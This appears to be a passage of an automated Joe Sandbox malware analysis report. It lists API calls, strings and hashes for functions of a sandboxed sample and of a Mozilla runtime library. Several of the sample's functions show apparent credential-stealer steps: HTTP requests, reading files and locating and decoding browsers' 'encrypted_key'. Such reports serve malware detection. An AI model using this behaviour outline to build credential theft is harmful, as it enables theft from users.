Part of subcall function 6C5C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C5C9470
Part of subcall function 6C5C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C5C9482
Part of subcall function 6C5C9420: __Init_thread_footer.LIBCMT ref: 6C5C949F

GetCurrentThreadId.KERNEL32 ref: 6C5CEC84
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C5CEC8C

Part of subcall function 6C5C94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C5C94EE
Part of subcall function 6C5C94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C5C9508

GetCurrentThreadId.KERNEL32 ref: 6C5CECA1
AcquireSRWLockExclusive.KERNEL32(6C60F4B8), ref: 6C5CECAE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C5CECC5
ReleaseSRWLockExclusive.KERNEL32(6C60F4B8), ref: 6C5CED0A
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C5CED19
CloseHandle.KERNEL32(?), ref: 6C5CED28
free.MOZGLUE(00000000), ref: 6C5CED2F
ReleaseSRWLockExclusive.KERNEL32(6C60F4B8), ref: 6C5CED59

Strings

[I %d/%d] profiler_ensure_started, xrefs: 6C5CEC94

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
String ID: [I %d/%d] profiler_ensure_started
API String ID: 4057186437-125001283
Opcode ID: dbe6fe9da9cb1abd9878b111ab98f38b1681c280938b3d169d74ab6302ef4c6a
Instruction ID: 7ca2ef572b4f4adf37141e6a94c68e992bd13abe7a0f4e965220504c0861ebc5
Opcode Fuzzy Hash: dbe6fe9da9cb1abd9878b111ab98f38b1681c280938b3d169d74ab6302ef4c6a
Instruction Fuzzy Hash: 3421E171700104EBDB009FA5DD85A9A7779EF8636DF10821CFC18A7741DB759C068BAB

Function 6C5AC570 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 277stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C5AC5A3
WideCharToMultiByte.KERNEL32 ref: 6C5AC9EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C5AC9FB
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C5ACA12
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5ACA2E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C5ACAA5

Strings

(null), xrefs: 6C5AC596
0, xrefs: 6C5AD30A

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: ByteCharMultiWidestrlen$freemalloc
String ID: (null)$0
API String ID: 4074790623-38302674
Opcode ID: 7596b57c1c685a13d7a88fb6ed0285287044c34e515ba9ed21d6637b79b2fedb
Instruction ID: e9ec76ab1ecab452585d4dd00c2e320ef94e8ed67a50370b6cd7bc0082c26d9e
Opcode Fuzzy Hash: 7596b57c1c685a13d7a88fb6ed0285287044c34e515ba9ed21d6637b79b2fedb
Instruction Fuzzy Hash: CFA180306093429FDB10EF6AC98475EBBE1AF89748F04891DE899D7751D732E806CB92

Function 003D52C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON

Download Yara Rule

APIs

Part of subcall function 003DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003DA7E6

Part of subcall function 003C6280: InternetOpenA.WININET(003E0DFE,00000001,00000000,00000000,00000000), ref: 003C62E1
Part of subcall function 003C6280: StrCmpCA.SHLWAPI(?,00E6F518), ref: 003C6303
Part of subcall function 003C6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003C6335
Part of subcall function 003C6280: HttpOpenRequestA.WININET(00000000,GET,?,00E6F000,00000000,00000000,00400100,00000000), ref: 003C6385
Part of subcall function 003C6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003C63BF
Part of subcall function 003C6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003C63D1

Part of subcall function 003DA8A0: lstrcpy.KERNEL32(?,003E0E17), ref: 003DA905

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 003D5318
lstrlen.KERNEL32(00000000), ref: 003D532F

Part of subcall function 003D8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 003D8E52

StrStrA.SHLWAPI(00000000,00000000), ref: 003D5364
lstrlen.KERNEL32(00000000), ref: 003D5383
lstrlen.KERNEL32(00000000), ref: 003D53AE

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Strings

ERROR, xrefs: 003D5432
ERROR, xrefs: 003D54A9
ERROR, xrefs: 003D53B9
ERROR, xrefs: 003D546F
ERROR, xrefs: 003D530A

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
String ID: ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 3240024479-1526165396
Opcode ID: 819205e3e36ced0dc220bdb12a29263dd25e1fe1e07d6337b9c0de89638a5536
Instruction ID: 0f2498116e13b31877d71223b0af690ee0388cf2749243d13fcb796d257c8862
Opcode Fuzzy Hash: 819205e3e36ced0dc220bdb12a29263dd25e1fe1e07d6337b9c0de89638a5536
Instruction Fuzzy Hash: 765131329105489BCB16FF64EE92EEE7779AF10300F504019F8069E692EF346F55EB52

Function 6C583480 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86librarytimeloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C583284,?,?,6C5A56F6), ref: 6C583492
GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C583284,?,?,6C5A56F6), ref: 6C5834A9
LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C583284,?,?,6C5A56F6), ref: 6C5834EF
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C58350E
__Init_thread_footer.LIBCMT ref: 6C583522
__aulldiv.LIBCMT ref: 6C583552
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C583284,?,?,6C5A56F6), ref: 6C58357C
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C583284,?,?,6C5A56F6), ref: 6C583592

Part of subcall function 6C5BAB89: EnterCriticalSection.KERNEL32(6C60E370,?,?,?,6C5834DE,6C60F6CC,?,?,?,?,?,?,?,6C583284), ref: 6C5BAB94
Part of subcall function 6C5BAB89: LeaveCriticalSection.KERNEL32(6C60E370,?,6C5834DE,6C60F6CC,?,?,?,?,?,?,?,6C583284,?,?,6C5A56F6), ref: 6C5BABD1

Strings

GetSystemTimePreciseAsFileTime, xrefs: 6C583508
kernel32.dll, xrefs: 6C5834EA

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
API String ID: 3634367004-706389432
Opcode ID: 378707acb3bd40b95998c43d029a5537243728768d3514c8a52bf8498faf2300
Instruction ID: 5668a97564836a35fd77c1a4878f99fe7ac21ef484086c2cabffeba2dcff0122
Opcode Fuzzy Hash: 378707acb3bd40b95998c43d029a5537243728768d3514c8a52bf8498faf2300
Instruction Fuzzy Hash: A031BE70B012159BDF04DFBACE98ABA77B9FB85304F10481DE505B3690EB70A905CBA9

Function 6C584480 Relevance: 16.8, APIs: 11, Instructions: 316COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(B60B60B8,?,?,?,?,6C5C4843,?), ref: 6C5845F5
free.MOZGLUE(?,?,?,?,?,?,?,?,6C5C4843,?), ref: 6C58468A
free.MOZGLUE(?,?,?,?,?,?,6C5C4843,?), ref: 6C5846C9
free.MOZGLUE(?), ref: 6C5846EF
free.MOZGLUE(?), ref: 6C584712
free.MOZGLUE(?), ref: 6C584735
free.MOZGLUE(?), ref: 6C584758
free.MOZGLUE(?), ref: 6C58477B
free.MOZGLUE(?), ref: 6C58479E

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: free$moz_xmalloc
String ID:
API String ID: 3009372454-0
Opcode ID: c0a14f7612f4f559b94d6999b76b750faef54aa833d9400ec6a14b5ad570583b
Instruction ID: debf3944f494724814bd97ac97262f238ca2a35dba965cbebec5a5e3cabb6c20
Opcode Fuzzy Hash: c0a14f7612f4f559b94d6999b76b750faef54aa833d9400ec6a14b5ad570583b
Instruction Fuzzy Hash: ADB1D471A02160CFDB18DF6CDCB076D77A9AF81328F584669EC16DBBD6E73098408B91

Function 003D4280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON

Download Yara Rule

APIs

Part of subcall function 003D8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 003D8E0B

lstrcat.KERNEL32(?,00000000), ref: 003D42EC
lstrcat.KERNEL32(?,00E6F138), ref: 003D430B
lstrcat.KERNEL32(?,?), ref: 003D431F
lstrcat.KERNEL32(?,00E6DD20), ref: 003D4333

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Part of subcall function 003D8D90: GetFileAttributesA.KERNEL32(00000000,?,003C1B54,?,?,003E564C,?,?,003E0E1F), ref: 003D8D9F

Part of subcall function 003C9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 003C9D39

Part of subcall function 003C99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003C99EC
Part of subcall function 003C99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 003C9A11
Part of subcall function 003C99C0: LocalAlloc.KERNEL32(00000040,?), ref: 003C9A31
Part of subcall function 003C99C0: ReadFile.KERNEL32(000000FF,?,00000000,003C148F,00000000), ref: 003C9A5A
Part of subcall function 003C99C0: LocalFree.KERNEL32(003C148F), ref: 003C9A90
Part of subcall function 003C99C0: CloseHandle.KERNEL32(000000FF), ref: 003C9A9A

Part of subcall function 003D93C0: GlobalAlloc.KERNEL32(00000000,003D43DD,003D43DD), ref: 003D93D3

StrStrA.SHLWAPI(?,00E6EFD0), ref: 003D43F3
GlobalFree.KERNEL32(?), ref: 003D4512

Part of subcall function 003C9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N<,00000000,00000000), ref: 003C9AEF
Part of subcall function 003C9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,003C4EEE,00000000,?), ref: 003C9B01
Part of subcall function 003C9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N<,00000000,00000000), ref: 003C9B2A
Part of subcall function 003C9AC0: LocalFree.KERNEL32(?,?,?,?,003C4EEE,00000000,?), ref: 003C9B3F

lstrcat.KERNEL32(?,00000000), ref: 003D44A3
StrCmpCA.SHLWAPI(?,003E08D1), ref: 003D44C0
lstrcat.KERNEL32(00000000,00000000), ref: 003D44D2
lstrcat.KERNEL32(00000000,?), ref: 003D44E5
lstrcat.KERNEL32(00000000,003E0FB8), ref: 003D44F4

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
String ID:
API String ID: 3541710228-0
Opcode ID: d2e0605154837226db07d34a45efcba125641c75620efff008205671fd51d619
Instruction ID: 2f46f31e4e59ee71fdb4cff81752ae990cc0c5b4b86620db4b5cd61e7ebb6e2e
Opcode Fuzzy Hash: d2e0605154837226db07d34a45efcba125641c75620efff008205671fd51d619
Instruction Fuzzy Hash: 347155B6900218ABDB15FBF0EC95FEE7379AB48300F008599F60597181EB75EB49CB91

Function 6C5EAC20 Relevance: 16.6, APIs: 11, Instructions: 92fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 6C5EAC52
CreateFileMappingW.KERNEL32 ref: 6C5EAC7D
GetSystemInfo.KERNEL32 ref: 6C5EAC98
MapViewOfFile.KERNEL32 ref: 6C5EACB0
GetSystemInfo.KERNEL32 ref: 6C5EACCD
MapViewOfFile.KERNEL32 ref: 6C5EAD05
UnmapViewOfFile.KERNEL32 ref: 6C5EAD1C
CloseHandle.KERNEL32 ref: 6C5EAD28
UnmapViewOfFile.KERNEL32 ref: 6C5EAD37
CloseHandle.KERNEL32 ref: 6C5EAD43
CloseHandle.KERNEL32 ref: 6C5EAD67

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
String ID:
API String ID: 1192971331-0
Opcode ID: 2f4c0a9a036ef295b053acd72e55b195b3959762710051c7b85fdb2f2c9ce08c
Instruction ID: ff729aa62ece17bbfaf75098c68ccbdc2aed1c58f802d56a7697732ef1466684
Opcode Fuzzy Hash: 2f4c0a9a036ef295b053acd72e55b195b3959762710051c7b85fdb2f2c9ce08c
Instruction Fuzzy Hash: B0315FB1A047048FDB00AF79DA8826EBFF0FF85345F01892DE99597351EB709489CB86

Function 6C5D9D00 Relevance: 13.7, APIs: 9, Instructions: 178timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C5D8273), ref: 6C5D9D65
free.MOZGLUE(6C5D8273,?), ref: 6C5D9D7C
free.MOZGLUE(?,?), ref: 6C5D9D92
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C5D9E0F
free.MOZGLUE(6C5D946B,?,?), ref: 6C5D9E24
free.MOZGLUE(?,?,?), ref: 6C5D9E3A
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C5D9EC8
free.MOZGLUE(6C5D946B,?,?,?), ref: 6C5D9EDF
free.MOZGLUE(?,?,?,?), ref: 6C5D9EF5

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
Opcode ID: 51266147962a92028b4f250c3d1993adaa0516485744cc99586c452a2b0c0173
Instruction ID: b4f8424ac289b22dc6624dfa174e9932eafdf6b22c557db46be32378b53ee8a4
Opcode Fuzzy Hash: 51266147962a92028b4f250c3d1993adaa0516485744cc99586c452a2b0c0173
Instruction Fuzzy Hash: A871AEB0909B41DBC712CF59C89095BF3F4FF99324B458659E88A9BB01EB30F885CB81

Function 6C5DDDC0 Relevance: 13.7, APIs: 9, Instructions: 152COMMON

Download Yara Rule

APIs

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6C5DDDCF

Part of subcall function 6C5BFA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C5BFA4B

Part of subcall function 6C5D90E0: free.MOZGLUE(?,00000000,?,?,6C5DDEDB), ref: 6C5D90FF
Part of subcall function 6C5D90E0: free.MOZGLUE(?,00000000,?,?,6C5DDEDB), ref: 6C5D9108

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C5DDE0D
free.MOZGLUE(00000000), ref: 6C5DDE41
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C5DDE5F
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C5DDEA3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C5DDEE9
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C5CDEFD,?,6C594A68), ref: 6C5DDF32

Part of subcall function 6C5DDAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C5DDB86
Part of subcall function 6C5DDAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C5DDC0E

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C5CDEFD,?,6C594A68), ref: 6C5DDF65
free.MOZGLUE(?), ref: 6C5DDF80

Part of subcall function 6C5A5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C5A5EDB
Part of subcall function 6C5A5E90: memset.VCRUNTIME140(ew^l,000000E5,?), ref: 6C5A5F27
Part of subcall function 6C5A5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C5A5FB2

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
String ID:
API String ID: 112305417-0
Opcode ID: 6e5283993fb1cf365a29f8c7404ef8c76adb067e24e4f51a8cba97c6b493b067
Instruction ID: 3066cf13f78e417820a43f97e9fa7605a9d15f95ef36df95f181d337cbf1b42f
Opcode Fuzzy Hash: 6e5283993fb1cf365a29f8c7404ef8c76adb067e24e4f51a8cba97c6b493b067
Instruction Fuzzy Hash: E151A1726017129BD7109B2DDC806AEB372AFD1318F97451CD91A63B00DB31B91ACFAA

Function 6C5E5D10 Relevance: 13.6, APIs: 9, Instructions: 126COMMON

Download Yara Rule

APIs

?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6C5E5C8C,?,6C5BE829), ref: 6C5E5D32
?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6C5E5C8C,?,6C5BE829), ref: 6C5E5D62
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6C5E5C8C,?,6C5BE829), ref: 6C5E5D6D
??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6C5E5C8C,?,6C5BE829), ref: 6C5E5D84
?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6C5E5C8C,?,6C5BE829), ref: 6C5E5DA4
?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6C5E5C8C,?,6C5BE829), ref: 6C5E5DC9
std::_Facet_Register.LIBCPMT ref: 6C5E5DDB
??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6C5E5C8C,?,6C5BE829), ref: 6C5E5E00
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6C5E5C8C,?,6C5BE829), ref: 6C5E5E45

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

